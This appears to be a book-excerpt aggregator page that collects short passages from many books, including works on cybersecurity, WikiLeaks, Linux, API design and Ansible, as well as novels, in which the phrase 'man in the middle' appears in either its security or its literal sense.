See also AT&T; corporations compellence, 168–169 competition, 5, 9 conventional operations, compared to cyber operations, 189 Conway, Kellyanne, 239 cookies, 35 corporate access: by China, 88; shaping and, 39; signaling and, 39 corporations: access to data from, combined with passive collection, 13–39; intelligence community and, 15–16, 64–85; laws compelling cooperation of, 25. See also AT&T; commercial partnerships Cosmos Cooperative Bank, 284–287 counterfeiting, 268–269, 270–271 counterintelligence, 108–125; ARROWECLIPSE, 112–113; detecting adversary’s hacking efforts against other targets, 116–120; fourth-party collection, 120–125; man-in-the-middle operations, 114–115; persistence / agressiveness in, 116; proactive, 109–110, 112; Tailored Access Operations (TAO), 112–115, 117, 258; targeting hop points, 112–113; Territorial Dispute (TeDi) program, 117–118, 120; uncovering of new actors by, 118–120 counternarcotics, 32 covert action, 309 CRASHOVERRIDE, 197–201, 204, 205, 310 credentials, stolen, 38, 191–193; DNC employees’, 215; in election interference, 218–220; in North Korean campaign, 276; in second Ukraine blackout, 197.


pages: 587 words: 117,894

Cybersecurity: What Everyone Needs to Know by P. W. Singer, Allan Friedman

4chan, A Declaration of the Independence of Cyberspace, air gap, Apple's 1984 Super Bowl advert, barriers to entry, Berlin Wall, bitcoin, blood diamond, borderless world, Brian Krebs, business continuity plan, Chelsea Manning, cloud computing, cognitive load, crowdsourcing, cuban missile crisis, data acquisition, do-ocracy, Dr. Strangelove, drone strike, Edward Snowden, energy security, failed state, fake news, Fall of the Berlin Wall, fault tolerance, Free Software Foundation, global supply chain, Google Earth, information security, Internet of things, invention of the telegraph, John Markoff, John Perry Barlow, Julian Assange, Khan Academy, M-Pesa, military-industrial complex, MITM: man-in-the-middle, mutually assured destruction, Network effects, packet switching, Peace of Westphalia, pre–internet, profit motive, RAND corporation, ransomware, RFC: Request For Comment, risk tolerance, rolodex, Seymour Hersh, Silicon Valley, Skype, smart grid, SQL injection, Steve Jobs, Stuxnet, Twitter Arab Spring, uranium enrichment, vertical integration, We are Anonymous. We are Legion, web application, WikiLeaks, Yochai Benkler, zero day, zero-sum game

Things got especially tricky once Stuxnet found its way into this target (it was later revealed that the delivery mechanism was infiltration through Iranian nuclear scientists’ own laptops and memory sticks). Langner discovered that the cyberattack didn’t shut down the centrifuges in any obvious manner. Instead, it ran a series of subroutines. One, known as a “man in the middle,” caused tiny adjustments in pressure inside the centrifuges. Another manipulated the speed of the centrifuges’ spinning rotors, causing them to alternately slow down and then speed back up, throwing the rotors out of whack and ruining their work. On top of this, every so often the malware would push the centrifuge speeds past the designed maximum.

But one man’s poor computer security turned out to have more significant consequences when the Israelis began to examine the files that the official had stored on the laptop’s hard drive, including pictures. One photo in particular caught the Israelis’ attention. It showed an Asian man in a blue tracksuit standing next to an Arab man in the middle of the Syrian desert. It could have been innocuous, but then Mossad identified the two men as Chon Chibu, a leader of the North Korean nuclear program, and Ibrahim Othman, director of the Syrian Atomic Energy Commission. Combined with other documents lifted from the hard drive, such as construction plans and photos of a type of pipe used for work on fissile materiel, the Israelis realized the laptop was an atomic alarm bell.


pages: 461 words: 125,845

This Machine Kills Secrets: Julian Assange, the Cypherpunks, and Their Fight to Empower Whistleblowers by Andy Greenberg

air gap, Apple II, Ayatollah Khomeini, Berlin Wall, Bill Gates: Altair 8800, Bletchley Park, Burning Man, Chelsea Manning, computerized markets, crowdsourcing, cryptocurrency, disinformation, domain-specific language, driverless car, drone strike, en.wikipedia.org, Evgeny Morozov, Fairchild Semiconductor, fault tolerance, hive mind, information security, Jacob Appelbaum, John Gilmore, John Perry Barlow, Julian Assange, Lewis Mumford, Mahatma Gandhi, military-industrial complex, Mitch Kapor, MITM: man-in-the-middle, Mohammed Bouazizi, Mondo 2000, Neal Stephenson, nuclear winter, offshore financial centre, operational security, PalmPilot, pattern recognition, profit motive, Ralph Nader, real-name policy, reality distortion field, Richard Stallman, Robert Hanssen: Double agent, Silicon Valley, Silicon Valley ideology, Skype, social graph, SQL injection, statistical model, stem cell, Steve Jobs, Steve Wozniak, Steven Levy, Teledyne, three-masted sailing ship, undersea cable, Vernor Vinge, We are Anonymous. We are Legion, We are the 99%, WikiLeaks, X Prize, Zimmermann PGP

But there’s an inherent Achilles’ heel in that scheme: If Bob has never met Alice, how does Bob get Alice’s key securely? She has to send it to him somehow. But they can’t encrypt the message that carries the key—they come up against the same problem of how to send a key that decrypts that message. If Alice gives up and mails Bob an unencrypted key, on the other hand, any sinister man-in-the-middle could intercept it, copy it, send it on its way, and then decode all their future messages. Unless Alice and Bob have already met in some dark alley and shared their key, private key encryption is hardly private at all. (In fact, it’s called “private key encryption” precisely because the key must be kept private, which is what makes actually using it so tough.)

And it has the unique, almost magical property: What’s encrypted with that key can only be decrypted with Bob’s private key. Suddenly the conundrum of how Alice mails the private key to Bob disappears. Bob already has the private key, and he can send his public key—the key Alice needs to encrypt messages that only Bob can unlock—to Alice on a postcard from London to New York. The sinister man-in-the-middle can read that postcard all he likes. Not only that, Bob posts his public key on his website, prints it on his business card, and even adds it to the signature of his e-mail. In fact, Bob wants everyone to see the public key, because it’s used for harmlessly scrambling secrets, not unscrambling them.


Drown by Junot Diaz

MITM: man-in-the-middle

New York, he said, carefully omitting the Nueva and the Yol. We ain’t going that far but you can ride with us to Trenton if you like. Where the hell you from pal? Miami. Miami. Miami’s kind of far from here. The other man looked at the driver. Are you a musician or something? Jes, Papi said. I play the accordion. That excited the man in the middle. Shit, my old man played the accordion but he was a Polack like me. I didn’t know you spiks played it too. What kind of polkas do you like? Polkas? Jesus, Will, the driver said. They don’t play polkas in Cuba. They drove on, slowing only to unfold their badges at the tolls. Papi sat still and listened to the man crying in the back.


pages: 170 words: 51,205

Information Doesn't Want to Be Free: Laws for the Internet Age by Cory Doctorow, Amanda Palmer, Neil Gaiman

Airbnb, barriers to entry, Big Tech, Brewster Kahle, cloud computing, Dean Kamen, Edward Snowden, game design, general purpose technology, Internet Archive, John von Neumann, Kickstarter, Large Hadron Collider, machine readable, MITM: man-in-the-middle, optical character recognition, plutocrats, pre–internet, profit maximization, recommendation engine, rent-seeking, Saturday Night Live, Skype, Steve Jobs, Steve Wozniak, Stewart Brand, Streisand effect, technological determinism, transfer pricing, Whole Earth Catalog, winner-take-all economy

Criminals like to hack DNS servers to redirect requests like “www.citibank.com” to lookalike webpages that they operate, so that they can get your banking details and clean you out when you unsuspectingly type in your password. Oppressive governments like to redirect gmail.com and facebook.com to their own “man-in-the-middle” servers, so that they can snoop on citizens’ email and figure out whom to arrest. Lots of people are trying to solve the DNS problem. It is real, and grave. Many Internet-security experts consider the insecurity of DNS to represent an existential threat to the Internet itself, and there are many efforts under way, like DNSSEC, to add a layer of security to the service.


pages: 483 words: 145,225

Rebel Code: Linux and the Open Source Revolution by Glyn Moody

barriers to entry, business logic, commoditize, Compatible Time-Sharing System, Debian, Dennis Ritchie, Donald Knuth, Eben Moglen, Free Software Foundation, ghettoisation, Guido van Rossum, history of Unix, hypertext link, Johann Wolfgang von Goethe, John Gilmore, Ken Thompson, Kickstarter, Larry Ellison, Larry Wall, Marc Andreessen, MITM: man-in-the-middle, Multics, Network effects, new economy, packet switching, RFC: Request For Comment, Richard Stallman, Silicon Valley, skunkworks, slashdot, SoftBank, Steve Ballmer, Steve Jobs, Steven Levy, the Cathedral and the Bazaar, thinkpad, VA Linux

A few hours after Linus’s final posting, Eric Raymond added his comments on the situation. People, these are the early-warning signs of potential burnout. Heed them and take warning. Linus’s stamina has been astonishing, but it’s not limitless. All of us (and yes, that means you too, Linus) need to cooperate to *reduce * the pressure on the critical man in the middle, rather than increasing it. He points out one central fact for the Linux development process:Linus is god until *he* says otherwise. Period. Flaming him doesn’t help, and isn’t fair—and you need to have been the key man in development of a must-never-fail piece of software before you even have standing to *think* about doing it.

In other words, Linus’s dropping patches too often was not just inconvenient but undermined the very mechanism that powered the open source development model. Raymond concludes with a warning couched in characteristically graphic and appropriate terms:These risks are bound to get worse over time because both system complexity and the developer pool are increasing. And the critical man in the middle—the “Jesus nut” in our helicopter—has a stress limit. We’re going to hit that limit someday. Maybe we’re pushing it now. He concludes:I’ve been worrying about this problem for months. (I’m our anthropologist, remember? It’s part of my *job* to notice how the social machinery works and where the failure modes are.)


pages: 225 words: 55,458

Back to School: Why Everyone Deserves a Second Chance at Education by Mike Rose

blue-collar work, centre right, confounding variable, creative destruction, delayed gratification, digital divide, George Santayana, income inequality, MITM: man-in-the-middle, moral panic, new economy, Ronald Reagan, The Bell Curve by Richard Herrnstein and Charles Murray, the built environment, urban renewal, War on Poverty

We ourselves have to be more creative in fusing book and workshop for those who go to school to fashion a better life. 80 four Who We Are: Portraits from an Urban Community College I. Remedial English “Forlorn,” the instructor, Mr. Quijada, asks, looking up from the essay the class is discussing. “What’s forlorn mean?” “Desire,” says the older man in the middle of the room—glasses, graying dreadlocks pulled back—then in the same breath adds “longing.” “Close, Leonard,” Mr. Quijada replies. “Longing can certainly lead to being forlorn.” Casually strategic, Mr. Quijada looks to the last row. “Kimberly, it’s good to see you back. Do you want to add to Leonard’s definition?”


Designing Web APIs: Building APIs That Developers Love by Brenda Jin, Saurabh Sahni, Amir Shevat

active measures, Amazon Web Services, augmented reality, Big Tech, blockchain, business logic, business process, cognitive load, continuous integration, create, read, update, delete, exponential backoff, Google Hangouts, if you build it, they will come, Lyft, machine readable, MITM: man-in-the-middle, premature optimization, pull request, Salesforce, Silicon Valley, Snapchat, software as a service, the market place, uber lyft, web application, WebSocket

OAuth scopes for sensitive information Protect sensitive information on your service by using dedicated OAuth scopes. This way, your users will not grant access to sen‐ sitive information to every application that might not need it. HTTPS endpoints Because access tokens are sent as part of every HTTP request, it’s important that your API endpoints require HTTPS. This prevents man-in-the-middle attacks. Verify redirect URL When the optional redirect URL is provided, during an authori‐ zation request, ensure that it matches to one of the registered URLs for the application. If not, the API server must show an error without showing the authorization prompt. This ensures that any returned secrets are not exposed to an attacker.


pages: 227 words: 63,186

An Elegant Puzzle: Systems of Engineering Management by Will Larson

Ben Horowitz, Cass Sunstein, Clayton Christensen, data science, DevOps, en.wikipedia.org, fault tolerance, functional programming, Google Earth, hive mind, Innovator's Dilemma, iterative process, Kanban, Kickstarter, Kubernetes, loose coupling, microservices, MITM: man-in-the-middle, no silver bullet, pull request, Richard Thaler, seminal paper, Sheryl Sandberg, Silicon Valley, statistical model, systems thinking, the long tail, web application

“Security Keys: Practical Cryptographic Second Factors for the Modern Web” Security keys like the YubiKey18 have emerged as the most secure second authentication factor, and this paper out of Google explains the motivations that led to their creation, as well as the design that makes them work. From the abstract: Security Keys are second-factor devices that protect users against phishing and man-in-the-middle attacks. Users carry a single device and can self-register it with any online service that supports the protocol. The devices are simple to implement and deploy, simple to use, privacy preserving, and secure against strong attackers. We have shipped support for Security Keys in the Chrome web browser and in Google’s online services.


pages: 266 words: 80,018

The Snowden Files: The Inside Story of the World's Most Wanted Man by Luke Harding

affirmative action, air gap, airport security, Anton Chekhov, Apple's 1984 Super Bowl advert, Berlin Wall, Big Tech, Bletchley Park, Chelsea Manning, disinformation, don't be evil, drone strike, Edward Snowden, Etonian, Firefox, Google Earth, information security, Jacob Appelbaum, job-hopping, Julian Assange, Khan Academy, kremlinology, Laura Poitras, Mark Zuckerberg, Maui Hawaii, MITM: man-in-the-middle, national security letter, operational security, Panopticon Jeremy Bentham, pre–internet, Ralph Waldo Emerson, rolodex, Rubik’s Cube, Silicon Valley, Skype, social graph, Steve Jobs, TechCrunch disrupt, undersea cable, web application, WikiLeaks

This mystery correspondent had an unusual request: he asked Greenwald to install PGP encryption software on to his laptop. Once up and running, it allows two parties to carry out an encrypted online chat. If used correctly, PGP guarantees privacy (the initials stand for ‘Pretty Good Privacy’); it prevents a man-in-the-middle attack by a third party. The source didn’t explain why this curious measure was needed. Greenwald had no objections – he had been meaning for some time to set up a tool widely employed by investigative journalists, by WikiLeaks and by others suspicious of government snooping. But there were two problems.


pages: 313 words: 75,583

Ansible for DevOps: Server and Configuration Management for Humans by Jeff Geerling

Abraham Maslow, AGPL, Amazon Web Services, cloud computing, continuous integration, database schema, Debian, defense in depth, DevOps, fault tolerance, Firefox, full text search, Google Chrome, inventory management, loose coupling, microservices, Minecraft, MITM: man-in-the-middle, punch-card reader, Ruby on Rails, web application

Look at each of the hops between you and Google’s CDN. Do you know who controls each of the devices between your computer and Google? Do you trust these operators with all of your personal or corporate secrets? Probably not. Each of these connection points—and each network device and cable connecting them—is a weak point exposing you to a man-in-the-middle attack. Strong encryption is needed between your computer and the destination if you want to ensure data security. rlogin, rsh and rcp rlogin was introduced in BSD 4.2 in 1983, and has been distributed with many UNIX-like systems alongside Telnet until recently. rlogin was used widely during the 80s and much of the 90s.


The Minor Adjustment Beauty Salon: No. 1 Ladies' Detective Agency by Alexander McCall Smith

MITM: man-in-the-middle, Sheryl Sandberg

At one level the answer was simple—he had never vacuumed the house—but there was an even more profound issue to be resolved: Did they even have a vacuum cleaner? If there was no vacuum cleaner, then it would look less bad for him that he had never used one in the house. Mind you, he had never swept the house either—and they did have a broom. A forest of hands went up, but it did not include his. Keitumeste pointed at a man in the middle. “Yes, Rra? When did you do that?” The man answered in a clear, confident voice. “Yesterday, Mma. I vacuumed the living room and the dining room, too. I would have done more if I had not been so tired.” Keitumeste nodded. “And what sort of vacuum cleaner is it, Rra?” The question, so innocently put, found its target.


pages: 302 words: 74,350

I Hate the Internet: A Novel by Jarett Kobek

Alan Greenspan, Anne Wojcicki, Blue Ocean Strategy, Burning Man, disruptive innovation, do what you love, driverless car, East Village, Edward Snowden, gentrification, Golden Gate Park, Google bus, Google Glasses, Google X / Alphabet X, immigration reform, indoor plumbing, informal economy, Jeff Bezos, Larry Ellison, liberation theology, low interest rates, Mark Zuckerberg, microaggression, MITM: man-in-the-middle, Norman Mailer, nuclear winter, packet switching, PageRank, Peter Thiel, public intellectual, quantitative easing, Ray Kurzweil, rent control, Ronald Reagan, Sheryl Sandberg, Silicon Valley, Snow Crash, Steve Jobs, Susan Wojcicki, tech worker, TechCrunch disrupt, technological singularity, Triangle Shirtwaist Factory, union organizing, V2 rocket, Vernor Vinge, vertical integration, wage slave, Whole Earth Catalog

Dennis formed Fear and Respect with a capital seed of $100,000,000. The money was a graduation present from his father. For over three decades, the old man, His Royal Highness Fatih bin Muhammad bin Abdulaziz al Saud, had run his own company. He’d built it into a powerhouse and made himself the third richest man in the Middle East. One of Fatih bin Muhammad’s few failures came during the dotcom era of the 1990s, when he’d lost a lot of money on bad investments. The most notorious was Kozmo.com. Kozmo.com was a one-hour delivery service that sold goods below cost and hoped to make up the money on delivery fees. The hysteria of the moment was such that even with a business model dedicated to losing money, the company raised about $250,000,000 in capital.


pages: 338 words: 74,302

Only Americans Burn in Hell by Jarett Kobek

"hyperreality Baudrillard"~20 OR "Baudrillard hyperreality", AltaVista, coherent worldview, corporate governance, crony capitalism, Donald Trump, East Village, General Magic , ghettoisation, Google Chrome, Great Leap Forward, haute couture, illegal immigration, indoor plumbing, Jeff Bezos, mandelbrot fractal, microdosing, military-industrial complex, MITM: man-in-the-middle, pre–internet, sexual politics, Seymour Hersh, Skype, Snapchat, Steve Bannon, Steve Jobs, Telecommunications Act of 1996

If people require safe spaces, then I see nothing wrong with providing them, as long as the institution tempers their presence with a robust environment of educational rigor.” When the questions were over, pleasantries were exchanged. HRH texted his manservant Dmitri Huda. “HEY NONNY HEY, ARE THINGS IN ORDER?????” asked HRH. “Yes, Dennis,” texted Dmitri Huda. “I’m downstairs.” HRH’s father Fatih bin Muhammad bin Abdulaziz Al Saud was the second-richest man in the Middle East. He built a fortune after being exiled from the Kingdom. This exile followed the parking-lot execution of Misha’al bint Fahd bin Muhammad bin Abdulaziz Al Saud. Fatih bin Muhammad was a convenient scapegoat for the assassination. It was said that he encouraged delusions of romance in Misha’al.


pages: 1,380 words: 190,710

Building Secure and Reliable Systems: Best Practices for Designing, Implementing, and Maintaining Systems by Heather Adkins, Betsy Beyer, Paul Blankinship, Ana Oprea, Piotr Lewandowski, Adam Stubblefield

air gap, anti-pattern, barriers to entry, bash_history, behavioural economics, business continuity plan, business logic, business process, Cass Sunstein, cloud computing, cognitive load, continuous integration, correlation does not imply causation, create, read, update, delete, cryptocurrency, cyber-physical system, database schema, Debian, defense in depth, DevOps, Edward Snowden, end-to-end encryption, exponential backoff, fault tolerance, fear of failure, general-purpose programming language, Google Chrome, if you see hoof prints, think horses—not zebras, information security, Internet of things, Kubernetes, load shedding, margin call, microservices, MITM: man-in-the-middle, NSO Group, nudge theory, operational security, performance metric, pull request, ransomware, reproducible builds, revision control, Richard Thaler, risk tolerance, self-driving car, single source of truth, Skype, slashdot, software as a service, source of truth, SQL injection, Stuxnet, the long tail, Turing test, undersea cable, uranium enrichment, Valgrind, web application, Y2K, zero day

Unauthenticated inputs Even if the user and build steps are trustworthy, most builds have dependencies on other artifacts. Any such dependency is a surface through which adversaries can potentially subvert the build. For example, if the build system fetches a dependency over HTTP without TLS, an attacker can perform a man-in-the-middle attack to modify the dependency in transit. For this reason, we recommend hermetic builds (see “Hermetic, Reproducible, or Verifiable?”). The build process should declare all inputs up front, and only the orchestrator should fetch those inputs. Hermetic builds give much higher confidence that the inputs listed in the provenance are correct.

Your environment may have other secrets that need attention, such as keys used for encryption of data at rest and cryptographic keys used for SSL. If your frontend web serving infrastructure is compromised or potentially accessible by an attacker, you may need to consider rotating your SSL keys. If you don’t take action after an attacker steals your keys, they might use the keys to perform a man-in-the-middle attack. Similarly, if the encryption key for records in your database is on a compromised database server, the safest path forward is to rotate the keys and reencrypt the data. Cryptographic keys are often used for application-level communications, as well. If the attacker had access to systems where such application-level keys are stored, you’ll want to rotate the keys.


pages: 274 words: 85,557

DarkMarket: Cyberthieves, Cybercops and You by Misha Glenny

Berlin Wall, Bretton Woods, Brian Krebs, BRICs, call centre, Chelsea Manning, Fall of the Berlin Wall, illegal immigration, James Watt: steam engine, Julian Assange, military-industrial complex, MITM: man-in-the-middle, pirate software, Potemkin village, power law, reserve currency, Seymour Hersh, Silicon Valley, Skype, SQL injection, Stuxnet, urban sprawl, white flight, WikiLeaks, zero day

The characters at this conference live in a contemporary Wonderland where convention is oft disregarded – ponytails and wire-rimmed glasses earnestly exchange information with starched military uniforms about ‘SQL injection vulnerabilities’. Besuited civil servants are deep in conversation with young men in jeans and T-shirts detailing the iniquities of ‘man-in-the-middle attacks’. To grasp even the very basics of cyber security in its rich variety, one must be prepared to learn countless new idioms that are being constantly added to or amended. Otherwise you can listen to a conversation that in basic vocabulary and syntax structure is unmistakably English, but is nonetheless completely meaningless to those unschooled in the arcane language.


pages: 278 words: 83,504

Boeing Versus Airbus: The Inside Story of the Greatest International Competition in Business by John Newhouse

Airbus A320, airline deregulation, Bay Area Rapid Transit, Boeing 747, Build a better mousetrap, corporate governance, demand response, high-speed rail, legacy carrier, low cost airline, MITM: man-in-the-middle, upwardly mobile

However, dropping the protectionist rules would require changes in domestic law, and Congress, if asked, was certain to refuse amending existing law unless other countries—notably Britain, France, Germany, and Japan—extended reciprocal benefits to the United States.7 To no one’s surprise, BA’s proposed merger with USAir churned up political turmoil. Two strong multistate lobbies formed up. One, belonging to BA-USAir, fought hard and resourcefully to maneuver approval of the deal. The other fought just as hard on behalf of the big three/fat four, and it held better cards. The man in the middle was Andrew Card, then secretary of transportation and until recently President George W. Bush’s chief of staff. Given the prohibition on foreign ownership, Card would have had to veto the deal if it appeared to transfer control of USAir to BA. However, BA was proposing to acquire 21 percent of the voting stock and one-fourth of the board membership.


pages: 234 words: 84,737

We Are Never Meeting in Real Life by Samantha Irby

Affordable Care Act / Obamacare, cotton gin, MITM: man-in-the-middle, obamacare, off-the-grid, Recombinant DNA, rolodex, Rosa Parks, sensible shoes, Silicon Valley, Steve Jobs, white flight, Zipcar

At some point in the evening I would have to take you aside to explain that I was going to sell the children’s piano to fund the latest of my father’s harebrained schemes, but that he’d assured me that this one was going to be the one that finally paid back a return on my investment. There’d inevitably be a fight of some kind, resulting in your having to drive my sobbing mother home and my body-slamming an old-ass man in the middle of the TV room while your kids cower in fear in the kitchen. So I guess what I’m saying is that death can sometimes be pretty great. — I will have to keep your parents at arm’s length because yours is the kind of family that goes on extended vacations in the wilderness together, and I’m afraid that if they like me too much, they will expect me to go with, and I am doing no such thing.


The Perfect Storm: A True Story of Men Against the Sea by Sebastian Junger

Dava Sobel, fail fast, MITM: man-in-the-middle, North Sea oil, Tragedy of the Commons, urban renewal

Smith is one of their own, and they're going to get him one way or another. It's full dark when the first helicopter, zeroed-in by the marker buoy, arrives on-scene. There's no sign of Smith. The Coast Guard pilot who spotted him, debriefed back on-base, says the dye was fresh and he was "awful sure" there was a man in the middle of it. The seas were too rough to tell whether he swam to the life raft that was dropped to him, though. Three hours later one of the helicopter pilots radios that they've spotted Smith near the radio marker buoy. Another H-60 and tanker plane prepare to launch from Suffolk, but no sooner are those orders given than the pilot on-scene corrects himself: He didn't spot a person, he spotted a life raft.


pages: 746 words: 221,583

The Children of the Sky by Vernor Vinge

air gap, combinatorial explosion, epigenetics, indoor plumbing, megacity, MITM: man-in-the-middle, power law, random walk, risk tolerance, technological singularity, the scientific method, Vernor Vinge

Radio has kept it a secret from all the packs who are using him.” “Hmm,” said Ravna. “I wonder if he’s smart enough to play Princess Pretending.” “Huh?” The word came from both Amdi and Jefri. After a moment Ritl chimed in with a mimic interrogative of her own. “Sorry.” She had violated her personal ban on Princesses. “Straumers call it a ‘Man in the Middle’ attack.” “Oh yeah,” said Amdi, “I thought of that. The problem is Vendacious has conditioned all the members to follow certain forwarding protocols. At best Mr. Radio is variably intelligent. From moment to moment, he may be smart enough for simultaneous lying. In between, he’ll drop the ball.”

There were likely two others fairly close, one that had been used for long-range relay to Fyr and one at the head of the chain to the Tropics. Right now the radio pack could easily be a fully-connected fivesome, perhaps even smarter than the night it had linked them with Amdi. Maybe such a pack couldn’t run a full Man-in-the-Middle, but all it had to do was not relay all it heard from here. If it was willing to risk its life.… She glanced at Jefri. He was as pale as he could be, stricken. He gave her a nod, understanding. Meantime, Zek still looked at them, intent. The creature had made a brave offer. Okay. Ravna nodded at him, and quietly asked something that might be innocuous even if it were relayed to listeners up and down Mr.


pages: 681 words: 214,967

A Peace to End All Peace: The Fall of the Ottoman Empire and the Creation of the Modern Middle East by David Fromkin

anti-communist, British Empire, colonial rule, Khartoum Gordon, Khyber Pass, MITM: man-in-the-middle, Monroe Doctrine, Suez canal 1869, trade route

Archibald Wavell (later Field Marshal Earl Wavell), an officer who served under Allenby in the Palestine campaign, commenting on the treaties bringing the First World War to an end CONTENTS List of Illustrations and Maps 10 Photo Credits 11 Acknowledgments 12 A Note on Spelling 14 Introduction 15 PART I At the Crossroads of History 1 THE LAST DAYS OF OLD EUROPE 23 2 THE LEGACY OF THE GREAT GAME IN ASIA 26 3 THE MIDDLE EAST BEFORE THE WAR 33 4 THE YOUNG TURKS URGENTLY SEEK AN ALLY 45 5 WINSTON CHURCHILL ON THE EVE OF WAR 51 6 CHURCHILL SEIZES TURKEY'S WARSHIPS 54 7 AN INTRIGUE AT THE SUBLIME PORTE 62 PART II Kitchener of Khartoum Looks Ahead 8 KITCHENER TAKES COMMAND 9 KITCHENER'S LIEUTENANTS 10 KITCHENER SETS OUT TO CAPTURE ISLAM 11 INDIA PROTESTS 12 THE MAN IN THE MIDDLE PART III Britain is Drawn into the Middle Eastern Quagmire 13 THE TURKISH COMMANDERS ALMOST LOSE THE WAR 14 KITCHENER ALLOWS BRITAIN TO ATTACK TURKEY 15 ON TO VICTORY AT THE DARDANELLES 16 RUSSIA'S GRAB FOR TURKEY 17 DEFINING BRITAIN'S GOALS IN THE MIDDLE EAST 18 AT THE NARROWS OF FORTUNE 19 THE WARRIORS 20 THE POLITICIANS 21 THE LIGHT THAT FAILED 79 88 96 106 111 119 124 130 137 146 150 155 159 163 22 CREATING THE ARAB BUREAU 168 23 MAKING PROMISES TO THE ARABS 173 24 MAKING PROMISES TO THE EUROPEAN ALLIES 188 25 TURKEY'S TRIUMPH AT THE TIGRIS 200 PART IV Subversion 26 BEHIND ENEMY LINES 207 27 KITCHENER'S LAST MISSION 216 28 HUSSEIN'S REVOLT 218 PART V The Allies at the Nadir of Their Fortunes 29 THE FALL OF THE ALLIED GOVERNMENTS: BRITAIN AND FRANCE 231 30 THE OVERTHROW OF THE CZAR 239 PART VI New Worlds and Promised Lands 31 THE NEW WORLD 253 32 LLOYD GEORGE'S ZIONISM 263 33 TOWARD THE BALFOUR DECLARATION 276 34 THE PROMISED LAND 284 PART VII Invading the Middle East 35 JERUSALEM FOR CHRISTMAS 305 36 THE ROAD TO DAMASCUS 315 37 THE BATTLE FOR SYRIA 332 PART VIII The Spoils of Victory 38 THE PARTING OF THE WAYS 351 39 BY THE SHORES OF TROY ' 363 PART IX The Tide Goes Out 40 THE TICKING CLOCK 383 41 BETRAYAL 389 42 THE UNREAL WORLD OF THE PEACE CONFERENCES 403 PART X Storm over Asia 43 THE TROUBLES BEGIN: 1919—1921 415 44 EGYPT: THE WINTER OF 1918—1919 417 45 AFGHANISTAN: THE SPRING OF 1919 421 46 ARABIA: THE SPRING OF 1919 424 47 TURKEY: JANUARY 1920 427 48 SYRIA AND LEBANON: THE SPRING AND SUMMER OF 1920 435 49 EASTERN PALESTINE (TRANSJORDAN): 1920 441 50 PALESTINE—ARABS AND JEWS: 1920 4 45 51 MESOPOTAMIA (IRAQ): 1920 449 52 PERSIA (IRAN): 1920 4 5 5 PART XI Russia Returns to the Middle East 53 UNMASKING BRITAIN'S ENEMIES 465 54 THE SOVIET CHALLENGE IN THE MIDDLE EAST 471 55 MOSCOW'S GOALS 475 56 A DEATH IN BUKHARA 480 PART XII The Middle Eastern Settlement of 1922 57 WINSTON CHURCHILL TAKES CHARGE 493 58 CHURCHILL AND THE QUESTION OF PALESTINE 515 59 THE ALLIANCES COME APART 530 60 A GREEK TRAGEDY 540 61 THE SETTLEMENT OF THE MIDDLE EASTERN QUESTION 558 Notes 569 Bibliography 607 Index 621 8 CONTENTS CONTENTS LIST OF ILLUSTRATIONS AND MAPS 1 Lord Kitchener 2 Sir Mark Sykes 3 Enver 4 Talaat 5 Djemal 6 Crowds gather outside the Sublime Porte, 1913 7 Turkish soldiers at Dardanelles fort, 1915 8 Allied fleet at entrance to Dardanelles 9 Pictorial map of the Dardanelles 10 H.M.S.

As the war progressed, British officials who ruled India increasingly came to believe that their most dangerous adversaries were neither the Turks nor the Germans, but the British officials governing Egypt; for despite India's protests, British Cairo went ahead with its intrigues in Mecca. 12 THE MAN IN THE MIDDLE i Mecca, where Mohammed was born, and Medina, to which he emigrated, are the holy cities that for Moslems everywhere give unique importance to the mountainous Hejaz, the long and narrow western section of the Arabian peninsula bordering the Red Sea. Hejaz means "separating"—a reference to the highlands that divide it from the plateau to the east.


pages: 329 words: 95,309

Digital Bank: Strategies for Launching or Becoming a Digital Bank by Chris Skinner

algorithmic trading, AltaVista, Amazon Web Services, Any sufficiently advanced technology is indistinguishable from magic, augmented reality, bank run, Basel III, bitcoin, Bitcoin Ponzi scheme, business cycle, business intelligence, business process, business process outsourcing, buy and hold, call centre, cashless society, clean water, cloud computing, corporate social responsibility, credit crunch, cross-border payments, crowdsourcing, cryptocurrency, demand response, disintermediation, don't be evil, en.wikipedia.org, fault tolerance, fiat currency, financial innovation, gamification, Google Glasses, high net worth, informal economy, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, Kevin Kelly, Kickstarter, M-Pesa, margin call, mass affluent, MITM: man-in-the-middle, mobile money, Mohammed Bouazizi, new economy, Northern Rock, Occupy movement, Pingit, platform as a service, Ponzi scheme, prediction markets, pre–internet, QR code, quantitative easing, ransomware, reserve currency, RFID, Salesforce, Satoshi Nakamoto, Silicon Valley, smart cities, social intelligence, software as a service, Steve Jobs, strong AI, Stuxnet, the long tail, trade route, unbanked and underbanked, underbanked, upwardly mobile, vertical integration, We are the 99%, web application, WikiLeaks, Y2K

A good example is the coordinated ZeuS malware attack in Q4 2010, where a web application supposedly from the bank asks the victim to input their mobile phone number. The victim is then asked via text message to install an application onto the phone and the application is used to intercept any text messages the victim sends thereafter. There is also a whole load of new man-in-the-middle and mobile malware attacks that are growing by the day such as a recent Facebook update about Justin Bieber, which resulted in over 100,000 in 24 hours with 27% via mobile Facebook. Every viewing downloaded malware. Then there is mobile hi-jacking, where you think you are on your mobile carrier’s network but you’re not.


Fearsome Particles by Trevor Cole

call centre, clean water, Khartoum Gordon, late fees, microplastics / micro fibres, MITM: man-in-the-middle

“He’s just going to be a minute.” Gerald turned and saw three people in line behind him. “It’ll just be a minute,” he repeated. “What are we waiting for?” said a wind-breakered woman at the end. “Some jerk gone to his car,” said a middle-aged farmer-type behind Gerald. A brokerish-looking man in the middle looked at the ceiling and sighed. “This is ridiculous,” said the woman. Gerald began to feel hot, and a little damp. He wanted to take off the jacket of his suit but he feared these people would mistake the movement for some sort of capitulation, and he had given the obese man his word. “He was in line before us,” said Gerald, addressing the queue.


pages: 324 words: 91,653

The Quantum Thief by Hannu Rajaniemi

augmented reality, cognitive dissonance, deep learning, gravity well, haute couture, MITM: man-in-the-middle, music of the spheres, quantum entanglement

There are loops in it, places where a node – representing a memory, an event, a person – has more than one parent. That means that sometimes, sharing gevulot about an innocuous memory, a taste or an intimate moment, can unlock whole swathes of a person’s exomemory. The gogol pirates have software that tries to map out a person’s gevulot tree, tries to scan for the key nodes in conversation. There is a man-in-the-middle attack software that attempts to intercept the quantum communications between a Watch and the exomemory. That will require a lot more brute force, and quantum computation capability besides: I will have to talk to Perhonen about that. A perfect emulation of the privacy sense organ which I want to start running immediately.


pages: 282 words: 92,998

Cyber War: The Next Threat to National Security and What to Do About It by Richard A. Clarke, Robert Knake

